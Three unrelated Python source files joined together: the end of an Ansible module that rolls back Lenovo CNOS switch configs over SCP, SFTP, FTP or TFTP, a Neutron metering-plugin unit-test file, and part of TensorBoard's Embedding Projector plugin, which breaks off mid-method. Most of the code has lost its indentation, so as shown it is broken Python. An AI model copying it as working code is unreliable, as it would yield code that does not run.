rcpath: "/anil/G8272-startup-config.txt"
serverusername: "root"
serverpassword: "root123"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Config file tranferred to Device"
'''
import sys
import time
import socket
import array
import json
import re
import os
try:
from ansible.module_utils.network.cnos import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
# Utility Method to rollback the running config or startup config
# This method supports only SCP or SFTP or FTP or TFTP
def doConfigRollBack(module, prompt, answer):
host = module.params['host']
server = module.params['serverip']
username = module.params['serverusername']
password = module.params['serverpassword']
protocol = module.params['protocol'].lower()
rcPath = module.params['rcpath']
configType = module.params['configType']
confPath = rcPath
retVal = ''
command = "copy " + protocol + " " + protocol + "://"
command = command + username + "@" + server + "/" + confPath
command = command + " " + configType + " vrf management\n"
cnos.debugOutput(command + "\n")
# cnos.checkForFirstTimeAccess(module, command, 'yes/no', 'yes')
cmd = []
if(protocol == "scp"):
scp_cmd1 = [{'command': command, 'prompt': 'timeout:', 'answer': '0'}]
scp_cmd2 = [{'command': '\n', 'prompt': 'Password:',
'answer': password}]
cmd.extend(scp_cmd1)
cmd.extend(scp_cmd2)
if(configType == 'startup-config'):
scp_cmd3 = [{'command': 'y', 'prompt': None, 'answer': None}]
cmd.extend(scp_cmd3)
retVal = retVal + str(cnos.run_cnos_commands(module, cmd))
elif(protocol == "sftp"):
sftp_cmd = [{'command': command, 'prompt': 'Password:',
'answer': password}]
cmd.extend(sftp_cmd)
# cnos.debugOutput(configType + "\n")
if(configType == 'startup-config'):
sftp_cmd2 = [{'command': 'y', 'prompt': None, 'answer': None}]
cmd.extend(sftp_cmd2)
retVal = retVal + str(cnos.run_cnos_commands(module, cmd))
elif(protocol == "ftp"):
ftp_cmd = [{'command': command, 'prompt': 'Password:',
'answer': password}]
cmd.extend(ftp_cmd)
if(configType == 'startup-config'):
ftp_cmd2 = [{'command': 'y', 'prompt': None, 'answer': None}]
cmd.extend(ftp_cmd2)
retVal = retVal + str(cnos.run_cnos_commands(module, cmd))
elif(protocol == "tftp"):
command = "copy " + protocol + " " + protocol
command = command + "://" + server + "/" + confPath
command = command + " " + configType + " vrf management\n"
cnos.debugOutput(command)
tftp_cmd = [{'command': command, 'prompt': None, 'answer': None}]
cmd.extend(tftp_cmd)
if(configType == 'startup-config'):
tftp_cmd2 = [{'command': 'y', 'prompt': None, 'answer': None}]
cmd.extend(tftp_cmd2)
retVal = retVal + str(cnos.run_cnos_commands(module, cmd))
else:
return "Error-110"
return retVal
# EOM
def main():
module = AnsibleModule(
argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=False),
username=dict(required=False),
password=dict(required=False, no_log=True),
enablePassword=dict(required=False, no_log=True),
deviceType=dict(required=True),
configType=dict(required=True),
protocol=dict(required=True),
serverip=dict(required=True),
rcpath=dict(required=True),
serverusername=dict(required=False),
serverpassword=dict(required=False, no_log=True),),
supports_check_mode=False)
outputfile = module.params['outputfile']
protocol = module.params['protocol'].lower()
output = ''
if protocol in ('tftp', 'ftp', 'sftp', 'scp'):
transfer_status = doConfigRollBack(module, None, None)
else:
transfer_status = 'Invalid Protocol option'
output = output + "\n Config Transfer status \n" + transfer_status
# Save it into the file
if '/' in outputfile:
path = outputfile.rsplit('/', 1)
# cnos.debugOutput(path[0])
if not os.path.exists(path[0]):
os.makedirs(path[0])
file = open(outputfile, "a")
file.write(output)
file.close()
# need to add logic to check when changes occur or not
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
        module.exit_json(changed=True, msg="Config file transferred to Device")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
|
# Copyright (C) 2013 eNovance SAS <[email protected]>
#
# Author: Sylvain Afchain <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.api.v2 import attributes as attr
from neutron.common import constants as n_constants
from neutron.common import topics
from neutron import context
from neutron.db import agents_db
from neutron.db import l3_agentschedulers_db
from neutron.db.metering import metering_rpc
from neutron.extensions import l3 as ext_l3
from neutron.extensions import metering as ext_metering
from neutron import manager
from neutron.openstack.common import timeutils
from neutron.openstack.common import uuidutils
from neutron.plugins.common import constants
from neutron.tests.unit.db.metering import test_db_metering
from neutron.tests.unit import test_db_plugin
from neutron.tests.unit import test_l3_plugin
_uuid = uuidutils.generate_uuid
METERING_SERVICE_PLUGIN_KLASS = (
"neutron.services.metering."
"metering_plugin.MeteringPlugin"
)
class MeteringTestExtensionManager(object):
def get_resources(self):
attr.RESOURCE_ATTRIBUTE_MAP.update(ext_metering.RESOURCE_ATTRIBUTE_MAP)
attr.RESOURCE_ATTRIBUTE_MAP.update(ext_l3.RESOURCE_ATTRIBUTE_MAP)
l3_res = ext_l3.L3.get_resources()
metering_res = ext_metering.Metering.get_resources()
return l3_res + metering_res
def get_actions(self):
return []
def get_request_extensions(self):
return []
class TestMeteringPlugin(test_db_plugin.NeutronDbPluginV2TestCase,
test_l3_plugin.L3NatTestCaseMixin,
test_db_metering.MeteringPluginDbTestCaseMixin):
resource_prefix_map = dict(
(k.replace('_', '-'), constants.COMMON_PREFIXES[constants.METERING])
for k in ext_metering.RESOURCE_ATTRIBUTE_MAP.keys()
)
def setUp(self):
plugin = 'neutron.tests.unit.test_l3_plugin.TestL3NatIntPlugin'
service_plugins = {'metering_plugin_name':
METERING_SERVICE_PLUGIN_KLASS}
ext_mgr = MeteringTestExtensionManager()
super(TestMeteringPlugin, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.uuid = '654f6b9d-0f36-4ae5-bd1b-01616794ca60'
uuid = 'neutron.openstack.common.uuidutils.generate_uuid'
self.uuid_patch = mock.patch(uuid, return_value=self.uuid)
self.mock_uuid = self.uuid_patch.start()
fanout = ('neutron.common.rpc_compat.RpcProxy.fanout_cast')
self.fanout_patch = mock.patch(fanout)
self.mock_fanout = self.fanout_patch.start()
self.tenant_id = 'a7e61382-47b8-4d40-bae3-f95981b5637b'
self.ctx = context.Context('', self.tenant_id, is_admin=True)
self.context_patch = mock.patch('neutron.context.Context',
return_value=self.ctx)
self.mock_context = self.context_patch.start()
self.topic = 'metering_agent'
def test_add_metering_label_rpc_call(self):
second_uuid = 'e27fe2df-376e-4ac7-ae13-92f050a21f84'
expected = {'args': {'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': self.uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'add_metering_label'}
tenant_id_2 = '8a268a58-1610-4890-87e0-07abb8231206'
self.mock_uuid.return_value = second_uuid
with self.router(name='router2', tenant_id=tenant_id_2,
set_context=True):
self.mock_uuid.return_value = self.uuid
with self.router(name='router1', tenant_id=self.tenant_id,
set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
self.mock_fanout.assert_called_with(self.ctx, expected,
topic=self.topic)
def test_remove_metering_label_rpc_call(self):
expected = {'args':
{'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': self.uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'add_metering_label'}
with self.router(tenant_id=self.tenant_id, set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
self.mock_fanout.assert_called_with(self.ctx, expected,
topic=self.topic)
expected['method'] = 'remove_metering_label'
self.mock_fanout.assert_called_with(self.ctx, expected,
topic=self.topic)
def test_remove_one_metering_label_rpc_call(self):
second_uuid = 'e27fe2df-376e-4ac7-ae13-92f050a21f84'
expected_add = {'args':
{'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': self.uuid},
{'rules': [],
'id': second_uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'add_metering_label'}
expected_remove = {'args':
{'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': second_uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'remove_metering_label'}
with self.router(tenant_id=self.tenant_id, set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
self.mock_uuid.return_value = second_uuid
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
self.mock_fanout.assert_called_with(self.ctx, expected_add,
topic=self.topic)
self.mock_fanout.assert_called_with(self.ctx, expected_remove,
topic=self.topic)
def test_update_metering_label_rules_rpc_call(self):
second_uuid = 'e27fe2df-376e-4ac7-ae13-92f050a21f84'
expected_add = {'args':
{'routers': [
{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [
{'remote_ip_prefix': '10.0.0.0/24',
'direction': 'ingress',
'metering_label_id': self.uuid,
'excluded': False,
'id': self.uuid},
{'remote_ip_prefix': '10.0.0.0/24',
'direction': 'egress',
'metering_label_id': self.uuid,
'excluded': False,
'id': second_uuid}],
'id': self.uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'update_metering_label_rules'}
expected_del = {'args':
{'routers': [
{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [
{'remote_ip_prefix': '10.0.0.0/24',
'direction': 'ingress',
'metering_label_id': self.uuid,
'excluded': False,
'id': self.uuid}],
'id': self.uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'update_metering_label_rules'}
with self.router(tenant_id=self.tenant_id, set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True) as label:
l = label['metering_label']
with self.metering_label_rule(l['id']):
self.mock_uuid.return_value = second_uuid
with self.metering_label_rule(l['id'], direction='egress'):
self.mock_fanout.assert_called_with(self.ctx,
expected_add,
topic=self.topic)
self.mock_fanout.assert_called_with(self.ctx,
expected_del,
topic=self.topic)
def test_delete_metering_label_does_not_clear_router_tenant_id(self):
tenant_id = '654f6b9d-0f36-4ae5-bd1b-01616794ca60'
with self.metering_label(tenant_id=tenant_id,
no_delete=True) as metering_label:
with self.router(tenant_id=tenant_id, set_context=True) as r:
router = self._show('routers', r['router']['id'])
self.assertEqual(tenant_id, router['router']['tenant_id'])
metering_label_id = metering_label['metering_label']['id']
self._delete('metering-labels', metering_label_id, 204)
router = self._show('routers', r['router']['id'])
self.assertEqual(tenant_id, router['router']['tenant_id'])
class TestMeteringPluginL3AgentScheduler(
l3_agentschedulers_db.L3AgentSchedulerDbMixin,
test_db_plugin.NeutronDbPluginV2TestCase,
test_l3_plugin.L3NatTestCaseMixin,
test_db_metering.MeteringPluginDbTestCaseMixin):
resource_prefix_map = dict(
(k.replace('_', '-'), constants.COMMON_PREFIXES[constants.METERING])
for k in ext_metering.RESOURCE_ATTRIBUTE_MAP.keys()
)
def setUp(self, plugin_str=None, service_plugins=None, scheduler=None):
if not plugin_str:
plugin_str = ('neutron.tests.unit.test_l3_plugin.'
'TestL3NatIntAgentSchedulingPlugin')
if not service_plugins:
service_plugins = {'metering_plugin_name':
METERING_SERVICE_PLUGIN_KLASS}
if not scheduler:
scheduler = plugin_str
ext_mgr = MeteringTestExtensionManager()
super(TestMeteringPluginL3AgentScheduler,
self).setUp(plugin=plugin_str, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.uuid = '654f6b9d-0f36-4ae5-bd1b-01616794ca60'
uuid = 'neutron.openstack.common.uuidutils.generate_uuid'
self.uuid_patch = mock.patch(uuid, return_value=self.uuid)
self.mock_uuid = self.uuid_patch.start()
cast = 'neutron.common.rpc_compat.RpcProxy.cast'
self.cast_patch = mock.patch(cast)
self.mock_cast = self.cast_patch.start()
self.tenant_id = 'a7e61382-47b8-4d40-bae3-f95981b5637b'
self.ctx = context.Context('', self.tenant_id, is_admin=True)
self.context_patch = mock.patch('neutron.context.Context',
return_value=self.ctx)
self.mock_context = self.context_patch.start()
self.l3routers_patch = mock.patch(scheduler +
'.get_l3_agents_hosting_routers')
self.l3routers_mock = self.l3routers_patch.start()
self.topic = 'metering_agent'
def test_add_metering_label_rpc_call(self):
second_uuid = 'e27fe2df-376e-4ac7-ae13-92f050a21f84'
expected1 = {'args': {'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': second_uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'add_metering_label'}
expected2 = {'args': {'routers': [{'status': 'ACTIVE',
'name': 'router2',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': second_uuid}],
'id': second_uuid}]},
'namespace': None,
'method': 'add_metering_label'}
# bind each router to a specific agent
agent1 = agents_db.Agent(host='agent1')
agent2 = agents_db.Agent(host='agent2')
agents = {self.uuid: agent1,
second_uuid: agent2}
def side_effect(context, routers, admin_state_up, active):
return [agents[routers[0]]]
self.l3routers_mock.side_effect = side_effect
with self.router(name='router1', tenant_id=self.tenant_id,
set_context=True):
self.mock_uuid.return_value = second_uuid
with self.router(name='router2', tenant_id=self.tenant_id,
set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
topic1 = "%s.%s" % (self.topic, 'agent1')
topic2 = "%s.%s" % (self.topic, 'agent2')
# check if there is a call per agent
expected = [mock.call(self.ctx, expected1, topic=topic1),
mock.call(self.ctx, expected2, topic=topic2)]
self.mock_cast.assert_has_calls(expected, any_order=True)
class TestMeteringPluginL3AgentSchedulerServicePlugin(
TestMeteringPluginL3AgentScheduler):
"""Unit tests for the case where separate service plugin
implements L3 routing.
"""
def setUp(self):
l3_plugin = ('neutron.tests.unit.test_l3_plugin.'
'TestL3NatAgentSchedulingServicePlugin')
service_plugins = {'metering_plugin_name':
METERING_SERVICE_PLUGIN_KLASS,
'l3_plugin_name': l3_plugin}
plugin_str = ('neutron.tests.unit.test_l3_plugin.'
'TestNoL3NatPlugin')
super(TestMeteringPluginL3AgentSchedulerServicePlugin, self).setUp(
plugin_str=plugin_str, service_plugins=service_plugins,
scheduler=l3_plugin)
class TestMeteringPluginRpcFromL3Agent(
test_db_plugin.NeutronDbPluginV2TestCase,
test_l3_plugin.L3NatTestCaseMixin,
test_db_metering.MeteringPluginDbTestCaseMixin):
resource_prefix_map = dict(
(k.replace('_', '-'), constants.COMMON_PREFIXES[constants.METERING])
for k in ext_metering.RESOURCE_ATTRIBUTE_MAP
)
def setUp(self):
service_plugins = {'metering_plugin_name':
METERING_SERVICE_PLUGIN_KLASS}
plugin = ('neutron.tests.unit.test_l3_plugin.'
'TestL3NatIntAgentSchedulingPlugin')
ext_mgr = MeteringTestExtensionManager()
super(TestMeteringPluginRpcFromL3Agent,
self).setUp(plugin=plugin, service_plugins=service_plugins,
ext_mgr=ext_mgr)
self.meter_plugin = manager.NeutronManager.get_service_plugins().get(
constants.METERING)
self.adminContext = context.get_admin_context()
self._register_l3_agent('agent1')
def _register_l3_agent(self, host):
agent = {
'binary': 'neutron-l3-agent',
'host': host,
'topic': topics.L3_AGENT,
'configurations': {},
'agent_type': n_constants.AGENT_TYPE_L3,
'start_flag': True
}
callback = agents_db.AgentExtRpcCallback()
callback.report_state(self.adminContext,
agent_state={'agent_state': agent},
time=timeutils.strtime())
def test_get_sync_data_metering(self):
with self.subnet() as subnet:
s = subnet['subnet']
self._set_net_external(s['network_id'])
with self.router(name='router1', subnet=subnet) as router:
r = router['router']
self._add_external_gateway_to_router(r['id'], s['network_id'])
with self.metering_label(tenant_id=r['tenant_id']):
callbacks = metering_rpc.MeteringRpcCallbacks(
self.meter_plugin)
data = callbacks.get_sync_data_metering(self.adminContext,
host='agent1')
self.assertEqual('router1', data[0]['name'])
self._register_l3_agent('agent2')
data = callbacks.get_sync_data_metering(self.adminContext,
host='agent2')
self.assertFalse(data)
self._remove_external_gateway_from_router(
r['id'], s['network_id'])
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Embedding Projector plugin."""
import collections
import functools
import imghdr
import mimetypes
import os
import threading
import numpy as np
from werkzeug import wrappers
from google.protobuf import json_format
from google.protobuf import text_format
from tensorboard import context
from tensorboard.backend.event_processing import plugin_asset_util
from tensorboard.backend.http_util import Respond
from tensorboard.compat import tf
from tensorboard.plugins import base_plugin
from tensorboard.plugins.projector import metadata
from tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorboard.util import tb_logging
logger = tb_logging.get_logger()
# Number of tensors in the LRU cache.
_TENSOR_CACHE_CAPACITY = 1
# HTTP routes.
CONFIG_ROUTE = "/info"
TENSOR_ROUTE = "/tensor"
METADATA_ROUTE = "/metadata"
RUNS_ROUTE = "/runs"
BOOKMARKS_ROUTE = "/bookmarks"
SPRITE_IMAGE_ROUTE = "/sprite_image"
_IMGHDR_TO_MIMETYPE = {
"bmp": "image/bmp",
"gif": "image/gif",
"jpeg": "image/jpeg",
"png": "image/png",
}
_DEFAULT_IMAGE_MIMETYPE = "application/octet-stream"
class LRUCache(object):
"""LRU cache.
Used for storing the last used tensor.
"""
def __init__(self, size):
if size < 1:
raise ValueError("The cache size must be >=1")
self._size = size
self._dict = collections.OrderedDict()
def get(self, key):
try:
value = self._dict.pop(key)
self._dict[key] = value
return value
except KeyError:
return None
def set(self, key, value):
if value is None:
raise ValueError("value must be != None")
try:
self._dict.pop(key)
except KeyError:
if len(self._dict) >= self._size:
self._dict.popitem(last=False)
self._dict[key] = value
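# A minimal usage sketch of the LRU cache above; `_demo_lru_cache` is an
# illustrative helper added for exposition and is not called by TensorBoard.
def _demo_lru_cache():
    cache = LRUCache(2)
    cache.set("a", 1)
    cache.set("b", 2)
    cache.get("a")  # Touch "a" so it becomes the most recently used entry.
    cache.set("c", 3)  # Evicts "b", the least recently used entry.
    assert cache.get("b") is None
    assert cache.get("a") == 1 and cache.get("c") == 3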
class EmbeddingMetadata(object):
"""Metadata container for an embedding.
The metadata holds different columns with values used for
visualization (color by, label by) in the "Embeddings" tab in
TensorBoard.
"""
def __init__(self, num_points):
"""Constructs a metadata for an embedding of the specified size.
Args:
num_points: Number of points in the embedding.
"""
self.num_points = num_points
self.column_names = []
self.name_to_values = {}
def add_column(self, column_name, column_values):
"""Adds a named column of metadata values.
Args:
column_name: Name of the column.
column_values: 1D array/list/iterable holding the column values. Must be
of length `num_points`. The i-th value corresponds to the i-th point.
Raises:
          ValueError: If `column_values` is not a 1D array, is not of length
            `num_points`, or if `column_name` is already used.
"""
# Sanity checks.
if isinstance(column_values, list) and isinstance(
column_values[0], list
):
raise ValueError(
'"column_values" must be a flat list, but we detected '
"that its first entry is a list"
)
if isinstance(column_values, np.ndarray) and column_values.ndim != 1:
raise ValueError(
'"column_values" should be of rank 1, '
"but is of rank %d" % column_values.ndim
)
if len(column_values) != self.num_points:
raise ValueError(
'"column_values" should be of length %d, but is of '
"length %d" % (self.num_points, len(column_values))
)
if column_name in self.name_to_values:
raise ValueError(
'The column name "%s" is already used' % column_name
)
self.column_names.append(column_name)
self.name_to_values[column_name] = column_values
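# Illustrative sketch of populating EmbeddingMetadata; the column names and
# values below are made up for the example and are not part of the plugin API.
def _demo_embedding_metadata():
    meta = EmbeddingMetadata(num_points=3)
    meta.add_column("label", ["cat", "dog", "bird"])
    meta.add_column("cluster", [0, 1, 1])
    return meta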
def _read_tensor_tsv_file(fpath):
with tf.io.gfile.GFile(fpath, "r") as f:
tensor = []
for line in f:
line = line.rstrip("\n")
if line:
tensor.append(list(map(float, line.split("\t"))))
return np.array(tensor, dtype="float32")
def _read_tensor_binary_file(fpath, shape):
if len(shape) != 2:
raise ValueError("Tensor must be 2D, got shape {}".format(shape))
tensor = np.fromfile(fpath, dtype="float32")
return tensor.reshape(shape)
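# Hedged sketch of the raw binary layout _read_tensor_binary_file expects:
# flat float32 values (native byte order) in row-major order, with the shape
# tracked out of band. The file path below is an arbitrary example, not a
# path used by the plugin.
def _demo_write_and_read_binary_tensor(fpath="/tmp/example_tensor.bytes"):
    data = np.arange(12, dtype="float32").reshape(3, 4)
    data.tofile(fpath)  # Shape information is not stored in the file itself.
    return _read_tensor_binary_file(fpath, shape=(3, 4))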
def _assets_dir_to_logdir(assets_dir):
sub_path = os.path.sep + metadata.PLUGINS_DIR + os.path.sep
if sub_path in assets_dir:
two_parents_up = os.pardir + os.path.sep + os.pardir
return os.path.abspath(os.path.join(assets_dir, two_parents_up))
return assets_dir
def _latest_checkpoints_changed(configs, run_path_pairs):
"""Returns true if the latest checkpoint has changed in any of the runs."""
for run_name, assets_dir in run_path_pairs:
if run_name not in configs:
config = ProjectorConfig()
config_fpath = os.path.join(assets_dir, metadata.PROJECTOR_FILENAME)
if tf.io.gfile.exists(config_fpath):
with tf.io.gfile.GFile(config_fpath, "r") as f:
file_content = f.read()
text_format.Merge(file_content, config)
else:
config = configs[run_name]
# See if you can find a checkpoint file in the logdir.
logdir = _assets_dir_to_logdir(assets_dir)
ckpt_path = _find_latest_checkpoint(logdir)
if not ckpt_path:
continue
if config.model_checkpoint_path != ckpt_path:
return True
return False
def _parse_positive_int_param(request, param_name):
"""Parses and asserts a positive (>0) integer query parameter.
Args:
request: The Werkzeug Request object
param_name: Name of the parameter.
Returns:
      The parsed parameter as an int, None if the parameter is missing, or -1
      if it is not a positive integer.
"""
param = request.args.get(param_name)
if not param:
return None
try:
param = int(param)
if param <= 0:
raise ValueError()
return param
except ValueError:
return -1
def _rel_to_abs_asset_path(fpath, config_fpath):
fpath = os.path.expanduser(fpath)
if not os.path.isabs(fpath):
return os.path.join(os.path.dirname(config_fpath), fpath)
return fpath
def _using_tf():
"""Return true if we're not using the fake TF API stub implementation."""
return tf.__version__ != "stub"
class ProjectorPlugin(base_plugin.TBPlugin):
"""Embedding projector."""
plugin_name = metadata.PLUGIN_NAME
def __init__(self, context):
"""Instantiates ProjectorPlugin via TensorBoard core.
Args:
context: A base_plugin.TBContext instance.
"""
self.data_provider = context.data_provider
self.logdir = context.logdir
self.readers = {}
self._run_paths = None
self._configs = {}
self.config_fpaths = None
self.tensor_cache = LRUCache(_TENSOR_CACHE_CAPACITY)
# Whether the plugin is active (has meaningful data to process and serve).
# Once the plugin is deemed active, we no longer re-compute the value
# because doing so is potentially expensive.
self._is_active = False
# The running thread that is currently determining whether the plugin is
# active. If such a thread exists, do not start a duplicate thread.
self._thread_for_determining_is_active = None
def get_plugin_apps(self):
asset_prefix = "tf_projector_plugin"
return {
RUNS_ROUTE: self._serve_runs,
CONFIG_ROUTE: self._serve_config,
TENSOR_ROUTE: self._serve_tensor,
METADATA_ROUTE: self._serve_metadata,
BOOKMARKS_ROUTE: self._serve_bookmarks,
SPRITE_IMAGE_ROUTE: self._serve_sprite_image,
"/index.js": functools.partial(
self._serve_file,
os.path.join(asset_prefix, "index.js"),
),
"/projector_binary.html": functools.partial(
self._serve_file,
os.path.join(asset_prefix, "projector_binary.html"),
),
"/projector_binary.js": functools.partial(
self._serve_file,
os.path.join(asset_prefix, "projector_binary.js"),
),
}
def is_active(self):
"""Determines whether this plugin is active.
This plugin is only active if any run has an embedding, and only
when running against a local log directory.
Returns:
Whether any run has embedding data to show in the projector.
"""
if not self.data_provider or not self.logdir:
return False
if self._is_active:
# We have already determined that the projector plugin should be active.
# Do not re-compute that. We have no reason to later set this plugin to be
# inactive.
return True
if self._thread_for_determining_is_active:
# We are currently determining whether the plugin is active. Do not start
# a separate thread.
return self._is_active
# The plugin is currently not active. The frontend might check again later.
# For now, spin off a separate thread to determine whether the plugin is
# active.
new_thread = threading.Thread(
target=self._determine_is_active,
name="ProjectorPluginIsActiveThread",
)
self._thread_for_determining_is_active = new_thread
new_thread.start()
return False
def frontend_metadata(self):
return base_plugin.FrontendMetadata(
es_module_path="/index.js",
disable_reload=True,
)
def _determine_is_active(self):
"""Determines whether the plugin is active.
This method is run in a separate thread so that the plugin can
offer an immediate response to whether it is active and
determine whether it should be active in a separate thread.
"""
self._update_configs()
if self._configs:
self._is_active = True
self._thread_for_determining_is_active = None
def _update_configs(self):
"""Updates `self._configs` and `self._run_paths`."""
if self.data_provider and self.logdir:
# Create a background context; we may not be in a request.
ctx = context.RequestContext()
run_paths = {
run.run_name: os.path.join(self.logdir, run.run_name)
for run in self.data_provider.list_runs(ctx, experiment_id="")
}
else:
run_paths = {}
run_paths_changed = run_paths != self._run_paths
self._run_paths = run_paths
run_path_pairs = list(self._run_paths.items())
self._append_plugin_asset_directories(run_path_pairs)
# Also accept the root logdir as a model checkpoint directory,
# so that the projector still works when there are no runs.
# (Case on `run` rather than `path` to avoid issues with
# absolute/relative paths on any filesystems.)
if "." not in self._run_paths:
run_path_pairs.append((".", self.logdir))
if run_paths_changed or _latest_checkpoints_changed(
self._configs, run_path_pairs
):
self.readers = {}
self._configs, self.config_fpaths = self._read_latest_config_files(
run_path_pairs
)
self._augment_configs_with_checkpoint_info()
def _augment_configs_with_checkpoint_info(self):
for run, config in self._configs.items():
for embedding in config.embeddings:
# Normalize the name of the embeddings.
if embedding.tensor_name.endswith(":0"):
embedding.tensor_name = embedding.tensor_name[:-2]
# Find the size of embeddings associated with a tensors file.
if embedding.tensor_path:
fpath = _rel_to_abs_asset_path(
embedding.tensor_path, self.config_fpaths[run]
)
tensor = self.tensor_cache.get((run, embedding.tensor_name))
if tensor is None:
try:
tensor = _read_tensor_tsv_file(fpath)
except UnicodeDecodeError:
tensor = _read_tensor_binary_file(
fpath, embedding.tensor_shape
)
self.tensor_cache.set(
(run, embedding.tensor_name), tensor
)
if not embedding.tensor_shape:
embedding.tensor_shape.extend(
[len(tensor), len(tensor[0])]
)
reader = self._get_reader_for_run(run)
if not reader:
continue
# Augment the configuration with the tensors in the checkpoint file.
special_embedding = None
if config.embeddings and not config.embeddings[0].tensor_name:
special_embedding = config.embeddings[0]
config.embeddings.remove(special_embedding)
var_map = reader.get_variable_to_shape_map()
for tensor_name, tensor_shape in var_map.items():
if len(tensor_shape) != 2:
continue
# Optimizer slot values are the same shape as embeddings
# but are not embeddings.
if ".OPTIMIZER_SLOT" in tensor_name:
continue
embedding = self._get_embedding(tensor_name, config)
if not embedding:
embedding = config.embeddings.add()
embedding.tensor_name = tensor_name
if special_embedding:
embedding.metadata_path = (
special_embedding.metadata_path
)
embedding.bookmarks_path = (
special_embedding.bookmarks_path
)
if not embedding.tensor_shape:
embedding.tensor_shape.extend(tensor_shape)
# Remove configs that do not have any valid (2D) tensors.
runs_to_remove = []
for run, config in self._configs.items():
if not config.embeddings:
runs_to_remove.append(run)
for run in runs_to_remove:
del self._configs[run]
del self.config_fpaths[run]
def _read_latest_config_files(self, run_path_pairs):
"""Reads and returns the projector config files in every run
directory."""
configs = {}
config_fpaths = {}
for run_name, assets_dir in run_path_pairs:
config = ProjectorConfig()
config_fpath = os.path.join(assets_dir, metadata.PROJECTOR_FILENAME)
if tf.io.gfile.exists(config_fpath):
with tf.io.gfile.GFile(config_fpath, "r") as f:
file_content = f.read()
text_format.Merge(file_content, config)
has_tensor_files = False
for embedding in config.embeddings:
if embedding.tensor_path:
if not embedding.tensor_name:
embedding.tensor_name = os.path.basename(
embedding.tensor_path
)
has_tensor_files = True
break
if not config.model_checkpoint_path:
# See if you can find a checkpoint file in the logdir.
logdir = _assets_dir_to_logdir(assets_dir)
ckpt_path = _find_latest_checkpoint(logdir)
if not ckpt_path and not has_tensor_files:
continue
if ckpt_path:
config.model_checkpoint_path = ckpt_path
# Sanity check for the checkpoint file existing.
if (
config.model_checkpoint_path
and _using_tf()
and not tf.io.gfile.glob(config.model_checkpoint_path + "*")
):
logger.warning(
'Checkpoint file "%s" not found',
config.model_checkpoint_path,
)
continue
configs[run_name] = config
config_fpaths[run_name] = config_fpath
return configs, config_fpaths
def _get_reader_for_run(self, run):
if run in self.readers:
return self.readers[run]
config = self._configs[run]
reader = None
if config.model_checkpoint_path and _using_tf():
try:
reader = tf.train.load_checkpoint(config.model_checkpoint_path)
except Exception: # pylint: disable=broad-except
logger.warning(
'Failed reading "%s"', config.model_checkpoint_path
)
self.readers[run] = reader
return reader
def _get_metadata_file_for_tensor(self, tensor_name, config):
embedding_info = self._get_embedding(tensor_name, config)
if embedding_info:
return embedding_info.metadata_path
return None
def _get_bookmarks_file_for_tensor(self, tensor_name, config):
embedding_info = self._get_embedding(tensor_name, config)
if embedding_info:
return embedding_info.bookmarks_path
return None
def _canonical_tensor_name(self, tensor_name):
if ":" not in tensor_name:
return tensor_name + ":0"
else:
return tensor_name
def _get_embedding(self, tensor_name, config):
if not config.embeddings:
return None
for info in config.embeddings:
if self._canonical_tensor_name(
info.tensor_name
) == self._canonical_tensor_name(tensor_name):
return info
return None
def _append_plugin_asset_directories(self, run_path_pairs):
extra = []
plugin_assets_name = metadata.PLUGIN_ASSETS_NAME
